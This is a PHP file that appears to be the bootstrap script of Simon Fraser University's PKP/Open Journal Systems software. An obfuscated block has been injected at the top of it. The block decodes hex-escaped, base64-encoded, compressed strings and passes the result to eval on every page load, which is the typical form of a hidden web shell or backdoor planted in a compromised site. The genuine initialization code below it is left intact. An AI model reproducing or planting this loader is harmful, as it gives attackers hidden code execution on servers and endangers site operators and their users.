<?php $Apaaja = "Sy1LzNFQKyzNL7G2V0svsYYw9YpLiuKL8ksMjTXSqzLz0nISS1KBrNK85Pz\x63gqLU4mLq\x43\x43\x63lFqe\x61m\x63Snp\x43\x62np6Rq\x41O0sSi3TUMn0SyzJSMwLKMrMK85JrdRE\x41tY\x41";$iNathanPrinsley = "\x3d\x3d\x41/lSwlS85s0ttlzHs\x42Q\x2bqfv0d\x2bI25j\x62ZUs\x42f\x61UuGUG9Yz3wXGM9uh\x61pIo\x2bp21o/si\x42Revd1T/ZZ4tF\x612EwYNIeI5xoSMVhJgKk\x2bUlPP6KIJ4upP/0P\x613\x2b\x42NgI1J6IPPXkUh/uu\x63wI7QrthLZEhQrtm/DUDVOGLryM9\x616oLIhyXq\x42glrEOtH5kOO\x61R96uUD1NpSWd/X\x2bNO4U56YR\x42NUVun\x41nv\x43\x62vvS7io\x62\x61e\x63ZTjS6es2\x62Lu\x63\x2b\x2b2WLQnyTY\x2bUjiHUFKfnwdtp20isRs5vuP\x2bP37sqNeZyIeDmP5/2o41v6FuiVkx\x61JRTu1\x43IZgRx\x41GOnxuxMpSUHkZJ61xIq4\x41Gmuozdfffd/df\x63TYPm39\x61m\x2b\x2b\x2bmg22eRTz\x42eXJkQSR0\x62MFepe2Qs\x2bO\x2b28gki\x42R/w\x2bH\x2b\x42\x42MDvUUQVl/\x61HQJ\x42wJe\x2b/\x63\x41wEg/KHQN\x42wJe\x2b/\x62\x41\x41Fg/6GQR\x42wJe\x2b/\x61\x41QFg/qGQV\x42wJe";eval(htmlspecialchars_decode(gzinflate(base64_decode($Apaaja))));;?>

<?php

/**
 * @defgroup index Index
 * Bootstrap and initialization code.
 */

/**
 * @file includes/bootstrap.inc.php
 *
 * Copyright (c) 2014-2021 Simon Fraser University
 * Copyright (c) 2000-2021 John Willinsky
 * Distributed under the GNU GPL v3. For full terms see the file docs/COPYING.
 *
 * @ingroup index
 *
 * @brief Core system initialization code.
 * This file is loaded before any others.
 * Any system-wide imports or initialization code should be placed here.
 */


/**
 * Basic initialization (pre-classloading).
 */

define('ENV_SEPARATOR', strtolower(substr(PHP_OS, 0, 3)) == 'win' ? ';' : ':');
if (!defined('DIRECTORY_SEPARATOR')) {
	// Older versions of PHP do not define this
	define('DIRECTORY_SEPARATOR', strtolower(substr(PHP_OS, 0, 3)) == 'win' ? '\\' : '/');
}
define('BASE_SYS_DIR', dirname(INDEX_FILE_LOCATION));
chdir(BASE_SYS_DIR);

// System-wide functions
require('./lib/pkp/includes/functions.inc.php');

// Initialize the application environment
import('classes.core.Application');

return new Application();
